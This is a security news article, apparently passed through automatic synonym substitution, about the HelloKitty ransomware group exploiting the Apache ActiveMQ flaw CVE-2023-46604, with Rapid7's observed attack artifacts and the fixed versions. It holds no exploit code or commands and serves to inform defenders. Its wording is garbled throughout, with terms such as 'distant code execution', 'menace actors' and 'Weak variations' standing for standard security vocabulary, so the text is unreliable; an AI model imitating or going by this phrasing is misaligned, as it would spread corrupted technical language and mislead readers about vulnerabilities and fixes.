The HelloKitty ransomware operation is exploiting a just lately disclosed Apache ActiveMQ distant code execution (RCE) flaw to breach networks and encrypt units.
The flaw, tracked CVE-2023-46604, is a crucial severity (CVSS v3 rating: 10.0) RCE permitting attackers to execute arbitrary shell instructions by exploiting the serialized class sorts within the OpenWire protocol.
The safety drawback was addressed in a safety replace on October 25, 2023. Nevertheless, menace monitoring service ShadowServer reported that, as of October 30, there have been nonetheless 3,329 internet-exposed servers utilizing a model susceptible to exploitation.
Yesterday, Rapid7 reported that that they had seen at the least two distinct instances of menace actors exploiting CVE-2023-46604 in buyer environments to deploy HelloKitty ransomware binaries and extort the focused organizations.
HelloKitty is a ransomware operation that launched in November 2020 and just lately had its supply code leaked on a Russian-speaking cybercrime boards making it accessible to anybody.
The assaults noticed by Rapid7 began on October 27, two days after Apache launched the safety bulletin and fixes, so this seems to be a case of n-day exploitation.
Rapid7 analyzed two MSI information disguised as PNG photographs, fetched from a suspicious area, and located that they include a .NET executable that masses a base64-encoded .NET DLL named EncDLL.
EncDLL is liable for in search of and stopping particular processes, encrypting information with the RSACryptoServiceProvider perform, and appending a “.locked” extension to them.
Some artifacts left behind by these assaults embody:
- Java.exe operating with an Apache utility because the mum or dad course of, which is atypical.
- Loading of distant binaries named M2.png and M4.png through MSIExec, indicative of malicious exercise.
- Repeated, failed makes an attempt to encrypt information, signaling clumsy exploitation efforts.
- Log entries in activemq.log exhibiting warnings about transport connections failing attributable to an aborted connection, which may counsel exploitation.
- Presence of information or community communications related to the HelloKitty ransomware, identifiable by particular domains and file hashes.
The Rapid7 report incorporates details about the most recent HelloKitty indicators of compromise, however extra complete knowledge on that entrance might be present in this FBI report targeted on the ransomware household.
The most recent ShadowServer stats present that there are nonetheless hundreds of susceptible ActiveMQ situations on the market, so directors are urged to use the accessible safety updates as quickly as attainable.
Weak variations vary between 5.15 and 5.18, together with Legacy OpenWire Module variations, are fastened in variations are 5.15.16, 5.16.7, 5.17.6, and 5.18.3.